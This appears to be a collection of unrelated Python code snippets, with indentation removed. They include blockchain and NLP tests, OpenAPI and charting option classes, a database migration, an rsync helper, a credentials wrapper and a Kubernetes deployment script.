assert (json['content'] == 'UPDATED_CONTENT') |
def PyQtColor(default='white', allow_none=False, **metadata):
if (default is None):
allow_none = True
if allow_none:
return Trait(default, None, standard_colors, convert_to_color, editor=get_color_editor, **metadata)
return Trait(default, standard_colors, convert_to_color, editor=get_color_editor, **metadata) |
def test_always_transact_block_identifier(accounts, tester, argv, web3, monkeypatch, history):
argv['always_transact'] = True
height = web3.eth.block_number
last_tx = history[(- 1)]
monkeypatch.setattr('brownie.network.chain.undo', (lambda : None))
tester.owner(block_identifier='latest')
assert (web3.eth.block_number == height)
assert (last_tx == history[(- 1)]) |
def process_type(typ):
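# Recursively flatten a Solidity ABI type into (base name, size, array dimensions): slices prepend an unsized dimension, fixed-size arrays a sized one.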
t = typ.t
if (t == SolType.IntTy):
return ('int', typ.size, [])
elif (t == SolType.UintTy):
return ('uint', typ.size, [])
elif (t == SolType.BoolTy):
return ('bool', '', [])
elif (t == SolType.StringTy):
return ('string', '', [])
elif (t == SolType.SliceTy):
(base, sub, arr) = process_type(typ.elem)
arr.insert(0, [])
return (base, sub, arr)
elif (t == SolType.ArrayTy):
(base, sub, arr) = process_type(typ.elem)
arr.insert(0, [typ.size])
return (base, sub, arr)
elif (t == SolType.AddressTy):
return ('address', '', [])
elif (t == SolType.FixedBytesTy):
return ('bytes', typ.size, [])
elif (t == SolType.BytesTy):
return ('bytes', '', [])
else:
assert False, 'type {} not supported'.format(t) |
def test_play_info():
ali = Aligo()
audio_info = ali.get_audio_play_info(file_id=audio_file_id)
assert isinstance(audio_info, GetAudioPlayInfoResponse)
assert (len(audio_info.template_list) > 0)
video_info = ali.get_video_preview_play_info(file_id=video_file_id)
assert isinstance(video_info, GetVideoPreviewPlayInfoResponse)
assert (len(video_info.video_preview_play_info.live_transcoding_task_list) > 0) |
class OptionSeriesColumnrangeSonificationDefaultinstrumentoptionsMappingVolume(Options):
@property
def mapFunction(self):
return self._config_get(None)
@mapFunction.setter
def mapFunction(self, value: Any):
self._config(value, js_type=False)
@property
def mapTo(self):
return self._config_get(None)
@mapTo.setter
def mapTo(self, text: str):
self._config(text, js_type=False)
@property
def max(self):
return self._config_get(None)
@max.setter
def max(self, num: float):
self._config(num, js_type=False)
@property
def min(self):
return self._config_get(None)
@min.setter
def min(self, num: float):
self._config(num, js_type=False)
@property
def within(self):
return self._config_get(None)
@within.setter
def within(self, value: Any):
self._config(value, js_type=False) |
def upgrade():
op.add_column('image_sizes', sa.Column('icon_size_quality', sa.Integer(), nullable=True))
op.add_column('image_sizes', sa.Column('icon_size_width_height', sa.Integer(), nullable=True))
op.add_column('image_sizes', sa.Column('small_size_quality', sa.Integer(), nullable=True))
op.add_column('image_sizes', sa.Column('small_size_width_height', sa.Integer(), nullable=True))
op.add_column('image_sizes', sa.Column('thumbnail_size_quality', sa.Integer(), nullable=True))
op.add_column('image_sizes', sa.Column('thumbnail_size_width_height', sa.Integer(), nullable=True)) |
def test_contract_deployment_with_constructor_with_arguments_non_strict(w3_non_strict_abi, non_strict_contract_with_constructor_args_factory):
deploy_txn = non_strict_contract_with_constructor_args_factory.constructor(1234, 'abcd').transact()
txn_receipt = w3_non_strict_abi.eth.wait_for_transaction_receipt(deploy_txn)
assert (txn_receipt is not None)
assert txn_receipt['contractAddress']
contract_address = txn_receipt['contractAddress']
blockchain_code = w3_non_strict_abi.eth.get_code(contract_address)
assert (blockchain_code == decode_hex(CONSTRUCTOR_WITH_ARGUMENTS_CONTRACT_RUNTIME)) |
class TlsCertificateDataAttributes(ModelNormal):
allowed_values = {}
validations = {}
@cached_property
def additional_properties_type():
return (bool, date, datetime, dict, float, int, list, str, none_type)
_nullable = False
@cached_property
def openapi_types():
return {'cert_blob': (str,), 'name': (str,)}
@cached_property
def discriminator():
return None
attribute_map = {'cert_blob': 'cert_blob', 'name': 'name'}
read_only_vars = {}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
for (var_name, var_value) in kwargs.items():
if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
continue
setattr(self, var_name, var_value)
return self
required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes'])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
for (var_name, var_value) in kwargs.items():
if ((var_name not in self.attribute_map) and (self._configuration is not None) and self._configuration.discard_unknown_keys and (self.additional_properties_type is None)):
continue
setattr(self, var_name, var_value)
if (var_name in self.read_only_vars):
raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.') |
class ChainedGraphicMatcher(GraphicMatcher):
def __init__(self, graphic_matchers: Sequence[GraphicMatcher]):
super().__init__()
self.graphic_matchers = graphic_matchers
def get_graphic_matches(self, semantic_graphic_list: Sequence[SemanticGraphic], candidate_semantic_content_list: Sequence[SemanticContentWrapper]) -> GraphicMatchResult:
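# Run each matcher in turn on the graphics left unmatched by its predecessors, accumulating matches into a single combined result.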
current_graphic_match_result = GraphicMatchResult(graphic_matches=[], unmatched_graphics=semantic_graphic_list)
for graphic_matcher in self.graphic_matchers:
if (not current_graphic_match_result.unmatched_graphics):
break
temp_graphic_matches = graphic_matcher.get_graphic_matches(current_graphic_match_result.unmatched_graphics, candidate_semantic_content_list)
if (not temp_graphic_matches.graphic_matches):
continue
current_graphic_match_result = GraphicMatchResult(graphic_matches=(list(current_graphic_match_result.graphic_matches) + list(temp_graphic_matches.graphic_matches)), unmatched_graphics=temp_graphic_matches.unmatched_graphics)
return current_graphic_match_result |
def local_rsync(options, fromdir, todir):
rsyncargs = ['rsync', '--recursive', '--safe-links', '--times', '--perms', '--one-file-system', '--delete', '--chmod=Da+rx,Fa-x,a+r,u+w']
if (not options.no_checksum):
rsyncargs.append('--checksum')
if options.verbose:
rsyncargs += ['--verbose']
if options.quiet:
rsyncargs += ['--quiet']
logging.debug(' '.join((rsyncargs + [fromdir, todir])))
if (subprocess.call((rsyncargs + [fromdir, todir])) != 0):
raise FDroidException() |
class StorageRepositoryClient(_base_repository.BaseRepositoryClient):
def __init__(self, credentials=None, quota_max_calls=None, quota_period=1.0, use_rate_limiter=True, cache_discovery=False, cache=None):
if (not quota_max_calls):
use_rate_limiter = False
self._buckets = None
self._bucket_acls = None
self._default_object_acls = None
self._objects = None
self._object_acls = None
super(StorageRepositoryClient, self).__init__(API_NAME, versions=['v1'], credentials=credentials, quota_max_calls=quota_max_calls, quota_period=quota_period, use_rate_limiter=use_rate_limiter, cache_discovery=cache_discovery, cache=cache)
@property
def buckets(self):
if (not self._buckets):
self._buckets = self._init_repository(_StorageBucketsRepository)
return self._buckets
@property
def bucket_acls(self):
if (not self._bucket_acls):
self._bucket_acls = self._init_repository(_StorageBucketAclsRepository)
return self._bucket_acls
@property
def default_object_acls(self):
if (not self._default_object_acls):
self._default_object_acls = self._init_repository(_StorageDefaultObjectAclsRepository)
return self._default_object_acls
@property
def objects(self):
if (not self._objects):
self._objects = self._init_repository(_StorageObjectsRepository)
return self._objects
@property
def object_acls(self):
if (not self._object_acls):
self._object_acls = self._init_repository(_StorageObjectAclsRepository)
return self._object_acls |
class Script(Revision):
_only_source_rev_file = re.compile('(?!__init__)(.*\\.py)$')
migration_class = None
path = None
def __init__(self, module, migration_class, path):
self.module = module
self.migration_class = migration_class
self.path = path
super(Script, self).__init__(self.migration_class.revision, self.migration_class.revises)
@property
def doc(self):
return re.split('\n\n', self.longdoc)[0]
@property
def longdoc(self):
doc = self.module.__doc__
return (doc.strip() if doc else '')
@property
def log_entry(self):
entry = ('Rev: %s%s%s%s\n' % (self.revision, (' (head)' if self.is_head else ''), (' (branchpoint)' if self.is_branch_point else ''), (' (mergepoint)' if self.is_merge_point else '')))
if self.is_merge_point:
entry += ('Merges: %s\n' % (self._format_down_revision(),))
else:
entry += ('Parent: %s\n' % (self._format_down_revision(),))
if self.is_branch_point:
entry += ('Branches into: %s\n' % format_with_comma(self.nextrev))
entry += ('Path: %s\n' % (self.path,))
entry += ('\n%s\n' % '\n'.join(((' %s' % para) for para in self.longdoc.splitlines())))
return entry
def __str__(self):
return ('%s -> %s%s%s%s, %s' % (self._format_down_revision(), self.revision, (' (head)' if self.is_head else ''), (' (branchpoint)' if self.is_branch_point else ''), (' (mergepoint)' if self.is_merge_point else ''), self.doc))
def _head_only(self, include_doc=False, include_parents=False, tree_indicators=True, head_indicators=True):
text = self.revision
if include_parents:
text = ('%s -> %s' % (self._format_down_revision(), text))
if (head_indicators or tree_indicators):
text += ('%s%s' % ((' (head)' if self._is_real_head else ''), (' (effective head)' if (self.is_head and (not self._is_real_head)) else '')))
if tree_indicators:
text += ('%s%s' % ((' (branchpoint)' if self.is_branch_point else ''), (' (mergepoint)' if self.is_merge_point else '')))
if include_doc:
text += (', %s' % self.doc)
return text
def cmd_format(self, verbose, include_doc=False, include_parents=False, tree_indicators=True):
if verbose:
return self.log_entry
else:
return self._head_only(include_doc, include_parents, tree_indicators)
def _format_down_revision(self):
if (not self.down_revision):
return '<base>'
else:
return format_with_comma(self._versioned_down_revisions)
@classmethod
def _from_filename(cls, scriptdir, filename):
py_match = cls._only_source_rev_file.match(filename)
if (not py_match):
return None
py_filename = py_match.group(1)
py_module = py_filename.split('.py')[0]
__import__(py_module)
module = sys.modules[py_module]
migration_class = getattr(module, 'Migration', None)
if (migration_class is None):
for v in module.__dict__.values():
if isinstance(v, Migration):
migration_class = v
break
return Script(module, migration_class, os.path.join(scriptdir.path, filename)) |
@pytest.mark.parametrize('predictors_only,expected_X,expected_y', [(True, (1309, 8), (1309,)), (False, (1309, 13), (1309,))])
def test_return_X_y(predictors_only, expected_X, expected_y):
(X, y) = load_titanic(return_X_y_frame=True, predictors_only=predictors_only)
assert (X.shape == expected_X)
assert (y.shape == expected_y) |
@pytest.mark.parametrize('src', [{'_target_': 'tests.instantiate.Adam'}])
def test_instantiate_adam(instantiate_func: Any, config: Any) -> None:
with raises(InstantiationException, match="Error in call to target 'tests\\.instantiate\\.Adam':\\nTypeError\\(.*\\)"):
instantiate_func(config)
adam_params = Parameters([1, 2, 3])
res = instantiate_func(config, params=adam_params)
assert (res == Adam(params=adam_params)) |
def main():
args = parse_commandline()
pod_deployment: Optional[K8sPodDeployment] = None
if args.from_file:
pod_deployment = K8sPodDeployment([Path(args.from_file)], None)
else:
dargs: List[Any] = [args.key, args.port, args.delegate_port, args.monitoring_port]
dargs.append((args.entry_peers_maddrs if (args.entry_peers_maddrs is not None) else ''))
docker_config: List[str] = []
if args.docker_fetchai_defaults_dev:
docker_config = [DOCKER_FETCHAI_DEFAULT_FILE_DEV, DOCKER_FETCHAI_DEFAULT_CTX_DEV, DOCKER_FETCHAI_DEFAULT_IMG, DOCKER_FETCHAI_DEFAULT_REGISTRY]
elif args.docker_fetchai_defaults:
docker_config = [DOCKER_FETCHAI_DEFAULT_FILE, DOCKER_FETCHAI_DEFAULT_CTX, DOCKER_FETCHAI_DEFAULT_IMG, DOCKER_FETCHAI_DEFAULT_REGISTRY]
if (args.docker_file is not None):
docker_config[0] = args.docker_file
if (args.docker_ctx is not None):
docker_config[1] = args.docker_ctx
if (args.docker_image is not None):
docker_config[2] = args.docker_image
if (args.docker_registry is not None):
docker_config[3] = args.docker_registry
dargs.extend(docker_config)
k8s_config: List[str] = []
if args.k8s_fetchai_defaults:
k8s_config = [K8S_FETCHAI_DEFAULT_PUBLIC_HOST, K8S_FETCHAI_DEFAULT_NAMESPACE, K8S_FETCHAI_DEFAULT_PUBLIC_TEMPLATE_DIR]
if (args.k8s_public_hostname is not None):
k8s_config[0] = args.k8s_public_hostname
if (args.k8s_namespace is not None):
k8s_config[1] = args.k8s_namespace
if (args.k8s_template_files_dir is not None):
k8s_config[2] = args.k8s_template_files_dir
dargs.extend(k8s_config)
pod_deployment = AcnK8sPodConfig(dargs[0], dargs[1], dargs[2], dargs[3], dargs[4], dargs[5], dargs[6], dargs[7], dargs[8], dargs[9], dargs[10], dargs[11], k8s_number_of_replicas=args.number_of_replicas).generate_deployment()
if args.generate_only:
return
try:
if args.delete_deployment:
pod_deployment.delete()
else:
pod_deployment.deploy()
except Exception as e:
raise e |
def extractLewdtranslationBlogspotCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('Everyone can do it! The Instant Love Switch', 'Everyone can do it! The Instant Love Switch', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def test_transformer_pipeline_tagger_senter_listener():
orig_config = Config().from_str(cfg_string)
nlp = util.load_model_from_config(orig_config, auto_fill=True, validate=True)
assert (nlp.pipe_names == ['transformer', 'tagger', 'senter'])
tagger = nlp.get_pipe('tagger')
transformer = nlp.get_pipe('transformer')
tagger_trf = tagger.model.get_ref('tok2vec').layers[0]
assert isinstance(transformer, Transformer)
assert isinstance(tagger_trf, TransformerListener)
train_examples = []
for t in TRAIN_DATA:
train_examples.append(Example.from_dict(nlp.make_doc(t[0]), t[1]))
for tag in t[1]['tags']:
tagger.add_label(tag)
optimizer = nlp.initialize((lambda : train_examples))
assert (tagger_trf in transformer.listeners)
for i in range(2):
losses = {}
nlp.update(train_examples, sgd=optimizer, losses=losses)
text = "We're interested at underwater basket weaving."
doc = nlp(text)
doc_tensor = tagger_trf.predict([doc])
_assert_equal_tensors(doc._.trf_data.tensors, doc_tensor[0].tensors)
with make_tempdir() as d:
file_path = (d / 'trained_nlp')
nlp.to_disk(file_path)
nlp2 = util.load_model_from_path(file_path)
doc2 = nlp2(text)
tagger2 = nlp2.get_pipe('tagger')
tagger_trf2 = tagger2.model.get_ref('tok2vec').layers[0]
doc_tensor2 = tagger_trf2.predict([doc2])
_assert_equal_tensors(doc_tensor2[0].tensors, doc_tensor[0].tensors)
file_path_2 = (d / 'trained_nlp_2')
nlp2.to_disk(file_path_2)
nlp_bytes = nlp.to_bytes()
nlp3 = util.load_model_from_config(orig_config, auto_fill=True, validate=True)
nlp3.from_bytes(nlp_bytes)
doc3 = nlp3(text)
tagger3 = nlp3.get_pipe('tagger')
tagger_trf3 = tagger3.model.get_ref('tok2vec').layers[0]
doc_tensor3 = tagger_trf3.predict([doc3])
_assert_equal_tensors(doc_tensor3[0].tensors, doc_tensor[0].tensors) |
class FileDialogDemo(HasTraits):
file_name = File()
open = Button('Open...')
traits_view = View(HGroup(Item('open', show_label=False), '_', Item('file_name', style='readonly', springy=True)), width=0.5)
def _open_changed(self):
file_name = open_file(extensions=LineCountInfo(), id=demo_id)
if (file_name != ''):
self.file_name = file_name |
def parse_css(cspace: Space, string: str, start: int=0, fullmatch: bool=True, color: bool=False) -> (tuple[(tuple[(Vector, float)], int)] | None):
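# Tokenize the CSS string and dispatch on its form (a color() function, hex, named color, or a space-specific function), returning ((coordinates, alpha), end index), or None when the string does not parse for this color space.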
target = cspace.SERIALIZE
if (not target):
target = (cspace.NAME,)
tokens = tokenize_css(string, start=start)
if (not tokens):
return None
if (tokens['id'] not in target):
return None
if (fullmatch and (tokens['end'] < len(string))):
return None
end = tokens['end']
if (('func' in tokens) and (tokens['func']['name'] == 'color')):
if (color is False):
return None
result = parse_color(tokens, cspace)
if (result is None):
return result
return (result, end)
elif (tokens['id'] == 'srgb'):
if ('hex' in tokens):
return (parse_hex(tokens['hex']['value']), end)
elif ('name' in tokens):
values = color_names.from_name(tokens['name']['color'])
return ((values[:(- 1)], values[(- 1)]), end)
else:
return (parse_rgb_channels([v['value'] for v in tokens['func']['values']], cspace.CHANNELS), end)
elif (tokens['id'] in ('--hsl', '--hwb')):
return (parse_channels([v['value'] for v in tokens['func']['values']], cspace.CHANNELS, scaled=True), end)
else:
return (parse_channels([v['value'] for v in tokens['func']['values']], cspace.CHANNELS), end) |
class ModelSerializerOptions(SerializerOptions):
def __init__(self, meta):
super(ModelSerializerOptions, self).__init__(meta)
self.model = getattr(meta, 'model', None)
self.read_only_fields = getattr(meta, 'read_only_fields', ())
self.write_only_fields = getattr(meta, 'write_only_fields', ()) |
def benchmark_vae(pt_vae, batch_size=1, height=64, width=64, benchmark_pt=False, verify=False):
latent_channels = 4
exe_module = Model('./tmp/AutoencoderKL/test.so')
if (exe_module is None):
print('Error!! Cannot find compiled module for AutoencoderKL.')
exit((- 1))
pt_vae = pt_vae.cuda().half()
pt_vae.eval()
pt_input = torch.rand([batch_size, latent_channels, height, width]).cuda().half()
print('pt_input shape', pt_input.shape)
with autocast('cuda'):
pt_output = pt_vae.decode(pt_input).sample
pt_output = pt_output.half()
if benchmark_pt:
args = (pt_input,)
pt_time = benchmark_torch_function(100, pt_vae.decode, *args)
print(f'PT batch_size: {batch_size}, {pt_time} ms')
with open('sd_pt_benchmark.txt', 'a') as f:
f.write(f'''vae batch_size: {batch_size}, latency: {pt_time} ms
''')
y = torch.empty(pt_output.size(0), pt_output.size(2), pt_output.size(3), pt_output.size(1)).cuda().half()
ait_input_pt_tensor = torch.permute(pt_input, (0, 2, 3, 1)).contiguous()
exe_module.run_with_tensors([ait_input_pt_tensor], [y])
if verify:
y_pt = torch.permute(y, (0, 3, 1, 2))
eps = 0.1
np.testing.assert_allclose(pt_output.detach().cpu().numpy(), y_pt.cpu().numpy(), atol=eps, rtol=eps)
logging.info('VAE Verification done!')
exe_module.benchmark_with_tensors([ait_input_pt_tensor], [y], count=100, repeat=4)
(t, _, _) = exe_module.benchmark_with_tensors([ait_input_pt_tensor], [y], count=100, repeat=4)
with open('sd_ait_benchmark.txt', 'a') as f:
f.write(f'''vae batch_size: {batch_size}, latency: {t} ms
''') |
def execute_workflow(ert: EnKFMain, storage: StorageAccessor, workflow_name: str) -> None:
logger = logging.getLogger(__name__)
try:
workflow = ert.ert_config.workflows[workflow_name]
except KeyError:
msg = 'Workflow {} is not in the list of available workflows'
logger.error(msg.format(workflow_name))
return
runner = WorkflowRunner(workflow, ert, storage)
runner.run_blocking()
if (not all((v['completed'] for v in runner.workflowReport().values()))):
logger.error(f'Workflow {workflow_name} failed!') |
@pytest.mark.benchmark
@using('xtb')
@pytest.mark.parametrize('fn, geoms, charge, mult, ref_energy', Bh.geom_iter)
def test_xtb_rx(fn, geoms, charge, mult, ref_energy, results_bag):
(start, ts_ref_org, end) = geoms
id_ = fn[:2]
with tempfile.TemporaryDirectory() as tmp_dir:
tmp_path = Path(tmp_dir)
inp_ts = str((tmp_path / 'ts_input.trj'))
with open(inp_ts, 'w') as handle:
handle.write(ts_ref_org.as_xyz())
ts_run_dict = {'geom': {'type': 'redund', 'fn': inp_ts}, 'calc': {'type': 'xtb', 'pal': 6, 'mem': 750, 'charge': charge, 'mult': mult, 'quiet': True}, 'tsopt': {'type': 'rsirfo', 'hessian_recalc': 1, 'trust_max': 0.3, 'thresh': 'gau', 'do_hess': True}}
ts_results = run_from_dict(ts_run_dict)
ts_ref = ts_results.ts_geom
ts_ref_energy = ts_ref.energy
ts_ref_imag = ts_ref.get_imag_frequencies()[0]
with tempfile.TemporaryDirectory() as tmp_dir:
tmp_path = Path(tmp_dir)
inp_trj = str((tmp_path / 'gs_inputs.trj'))
write_geoms_to_trj((start, end), inp_trj)
run_dict = {'geom': {'type': 'dlc', 'fn': inp_trj}, 'calc': {'type': 'xtb', 'pal': 1, 'mem': 750, 'charge': charge, 'mult': mult}, 'preopt': {'max_cycles': 5}, 'cos': {'type': 'gs', 'climb': True, 'climb_rms': 0.0075, 'reset_dlc': True}, 'opt': {'type': 'string', 'max_step': 0.2, 'rms_force': 0.005, 'rms_force_only': True}, 'tsopt': {'type': 'rsirfo', 'thresh': 'gau', 'trust_max': 0.5, 'do_hess': True}}
if (id_ == '02'):
run_dict['geom']['type'] = 'cart'
elif (id_ == '19'):
run_dict['opt']['rms_force'] = 0.003
results = run_from_dict(run_dict)
ts_geom = results.ts_geom
ts_energy = ts_geom.energy
ts_imag = ts_geom.get_imag_frequencies()[0]
opt = results.opt
ts_opt = results.ts_opt
rmsd = ts_ref.rmsd(ts_geom)
diff = (ts_ref_energy - ts_energy)
cmt = ('Ref' if (diff < 0.0) else ' TS')
rmsd_fmt = ' >12.4f'
print(f'RMSD: {rmsd:{rmsd_fmt}}')
print(f' TS energy: {ts_energy:.6f}')
print(f'Ref energy: {ts_ref_energy:.6f}')
print(f' Diff: {diff:.6f}')
print(f'{id_} : rmsd={rmsd:{rmsd_fmt}}, E= {diff: .6f} {cmt} is lower, fn={fn[:10]}, cycs: opt={(opt.cur_cycle + 1): >2d}, tsopt={(ts_opt.cur_cycle + 1): >2d}')
results_bag.opt_converged = opt.is_converged
results_bag.opt_cycles = (opt.cur_cycle + 1)
results_bag.tsopt_cycles = (ts_opt.cur_cycle + 1)
results_bag.rmsd = rmsd
assert results.ts_opt.is_converged
shutil.copy('ts_opt.xyz', f'{id_}_ts_opt.xyz')
ts_ref_org.comment = 'TS ref org'
ts_ref.comment = 'TS ref opt'
ts_geom.comment = 'TS opt from cos'
ts_geoms = (ts_ref_org, ts_ref, ts_geom)
align_geoms(ts_geoms)
ts_fns = f'{id_}_ts_geoms.trj'
write_geoms_to_trj(ts_geoms, ts_fns) |
def merge_in_fixed_mismatch():
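# Re-parse previously mismatching test data with the current parser, separating rows that now round-trip correctly from those that still disagree.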
test_data = load_test_data(only_mismatch=True)
count = 0
mismatch = 0
remlines = []
good_lines = []
good_sets = []
for (key, value) in test_data:
p = TPN(key)
(vol, chp, frag, post) = (p.getVolume(), p.getChapter(), p.getFragment(), p.getPostfix())
(e_vol, e_chp, e_frag, e_post) = value
if ((vol != e_vol) or (chp != e_chp) or (frag != e_frag) or (e_post != post)):
(badtmp, remline) = format_double_row(key, output_volume=e_vol, output_chapter=e_chp, output_fragment=e_frag, output_postfix=e_post, expect_volume=vol, expect_chapter=chp, expect_fragment=frag, expect_postfix=post)
remlines.append(remline)
else:
goodtmp = format_row(key, e_vol, e_chp, e_frag, e_post)
good_lines.append(goodtmp)
good_sets.append((key, value))
count += 1
print('{} Items with parsed output'.format(count))
print('{} Items mismatch in new parser'.format(len(remlines)))
print('{} OK lines'.format(len(good_lines)))
print('Total items: {}'.format(len(test_data)))
if good_lines:
comment_mismatches(good_lines, mismatch=True)
create_set_files_for_values(good_sets) |
class ModelMeta(type):
def __new__(cls, name, bases, attrs):
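# Register the model class with its registry, default the table name to the lowercased class name, and attach the registry to each field while recording the primary key name.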
model_class = super().__new__(cls, name, bases, attrs)
if ('registry' in attrs):
model_class.database = attrs['registry'].database
attrs['registry'].models[name] = model_class
if ('tablename' not in attrs):
setattr(model_class, 'tablename', name.lower())
for (name, field) in attrs.get('fields', {}).items():
setattr(field, 'registry', attrs.get('registry'))
if field.primary_key:
model_class.pkname = name
return model_class
@property
def table(cls):
if (not hasattr(cls, '_table')):
cls._table = cls.build_table()
return cls._table
@property
def columns(cls) -> sqlalchemy.sql.ColumnCollection:
return cls._table.columns |
class OptionSeriesBellcurveSonificationPointgrouping(Options):
@property
def algorithm(self):
return self._config_get('minmax')
@algorithm.setter
def algorithm(self, text: str):
self._config(text, js_type=False)
@property
def enabled(self):
return self._config_get(True)
@enabled.setter
def enabled(self, flag: bool):
self._config(flag, js_type=False)
@property
def groupTimespan(self):
return self._config_get(15)
@groupTimespan.setter
def groupTimespan(self, num: float):
self._config(num, js_type=False)
@property
def prop(self):
return self._config_get('y')
@prop.setter
def prop(self, text: str):
self._config(text, js_type=False) |
class OptionPlotoptionsAreaSonificationContexttracksMappingPan(Options):
@property
def mapFunction(self):
return self._config_get(None)
@mapFunction.setter
def mapFunction(self, value: Any):
self._config(value, js_type=False)
@property
def mapTo(self):
return self._config_get(None)
@mapTo.setter
def mapTo(self, text: str):
self._config(text, js_type=False)
@property
def max(self):
return self._config_get(None)
@max.setter
def max(self, num: float):
self._config(num, js_type=False)
@property
def min(self):
return self._config_get(None)
@min.setter
def min(self, num: float):
self._config(num, js_type=False)
@property
def within(self):
return self._config_get(None)
@within.setter
def within(self, value: Any):
self._config(value, js_type=False) |
class RefreshingCredentials():
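# Synchronous facade over Credentials: each token-returning method wraps the result in a RefreshingToken, so callers receive tokens that renew themselves.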
def __init__(self, client_id: str, client_secret: str=None, redirect_uri: str=None, sender: Sender=None):
self.credentials = Credentials(client_id, client_secret, redirect_uri, sender, asynchronous=False)
def __repr__(self):
options = [f'client_id={self.credentials.client_id!r}', f'client_secret={self.credentials.client_secret!r}', f'redirect_uri={self.credentials.redirect_uri!r}', f'sender={self.credentials.sender!r}']
return (((type(self).__name__ + '(') + ', '.join(options)) + ')')
def request_client_token(self) -> RefreshingToken:
token = self.credentials.request_client_token()
return RefreshingToken(token, self.credentials)
def user_authorisation_url(self, scope=None, state: str=None, show_dialog: bool=False) -> str:
return self.credentials.user_authorisation_url(scope, state, show_dialog)
def request_user_token(self, code: str) -> RefreshingToken:
token = self.credentials.request_user_token(code)
return RefreshingToken(token, self.credentials)
def refresh_user_token(self, refresh_token: str) -> RefreshingToken:
token = self.credentials.refresh_user_token(refresh_token)
return RefreshingToken(token, self.credentials)
def pkce_user_authorisation(self, scope=None, state: str=None, verifier_bytes: int=32) -> Tuple[(str, str)]:
return self.credentials.pkce_user_authorisation(scope, state, verifier_bytes)
def request_pkce_token(self, code: str, verifier: str) -> RefreshingToken:
token = self.credentials.request_pkce_token(code, verifier)
return RefreshingToken(token, self.credentials)
def refresh_pkce_token(self, refresh_token: str) -> RefreshingToken:
token = self.credentials.refresh_pkce_token(refresh_token)
return RefreshingToken(token, self.credentials) |
def calculate_regression_performance(dataset: pd.DataFrame, columns: DatasetColumns, error_bias_prefix: str) -> RegressionPerformanceMetrics:
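# Compute overall quality metrics, then error-quantile diagnostics (normality, underperformance) and a per-feature error bias table.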
target_column = columns.utility_columns.target
prediction_column = columns.utility_columns.prediction
num_feature_names = columns.num_feature_names
cat_feature_names = columns.cat_feature_names
if ((target_column is None) or (prediction_column is None)):
raise ValueError('Target and prediction should be present')
_prepare_dataset(dataset, target_column, prediction_column)
quality_metrics = _calculate_quality_metrics(dataset, prediction_column, target_column)
err_quantiles = error_with_quantiles(dataset, prediction_column, target_column, quantile=0.05)
quality_metrics['error_normality'] = _calculate_error_normality(err_quantiles)
quality_metrics['underperformance'] = _calculate_underperformance(err_quantiles)
quality_metrics['error_bias'] = {}
feature_bias = error_bias_table(dataset, err_quantiles, num_feature_names, cat_feature_names)
quality_metrics['error_bias'] = {feature: dict(feature_type=bias.feature_type, **bias.as_dict(error_bias_prefix)) for (feature, bias) in feature_bias.items()}
return RegressionPerformanceMetrics(**quality_metrics) |
def test_slurm_error_mocked(tmp_path: Path) -> None:
with mocked_slurm() as mock:
executor = slurm.SlurmExecutor(folder=tmp_path)
executor.update_parameters(time=24, gpus_per_node=0)
job = executor.submit(test_core.do_nothing, 1, 2, error=12)
with mock.job_context(job.job_id):
with pytest.raises(ValueError):
submission.process_job(job.paths.folder)
_mock_log_files(job, errors='This is the error log\n')
with pytest.raises(utils.FailedJobError):
job.result()
exception = job.exception()
assert isinstance(exception, utils.FailedJobError) |
def test_univariate_integrate(univariate_data):
x = univariate_data.x
y = univariate_data.y
integral_expected = univariate_data.integral
spline = csaps.CubicSmoothingSpline(x, y, smooth=None).spline
integral = spline.integrate(x[0], x[(- 1)])
assert (integral == pytest.approx(integral_expected)) |
class FlytekitPlugin():
@staticmethod
def get_remote(config: Optional[str], project: str, domain: str, data_upload_location: Optional[str]=None) -> FlyteRemote:
cfg_file = get_config_file(config)
if (cfg_file is None):
cfg_obj = Config.for_sandbox()
logger.info('No config files found, creating remote with sandbox config')
else:
cfg_obj = Config.auto(config)
logger.info((f'Creating remote with config {cfg_obj}' + (f' with file {config}' if config else '')))
return FlyteRemote(cfg_obj, default_project=project, default_domain=domain, data_upload_location=data_upload_location)
@staticmethod
def configure_pyflyte_cli(main: Group) -> Group:
return main
@staticmethod
def secret_requires_group() -> bool:
return True |
class LoggingSplunkAdditional(ModelNormal):
allowed_values = {}
validations = {}
@cached_property
def additional_properties_type():
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type)
_nullable = False
@cached_property
def openapi_types():
lazy_import()
return {'url': (str,), 'token': (str,), 'use_tls': (LoggingUseTls,)}
@cached_property
def discriminator():
return None
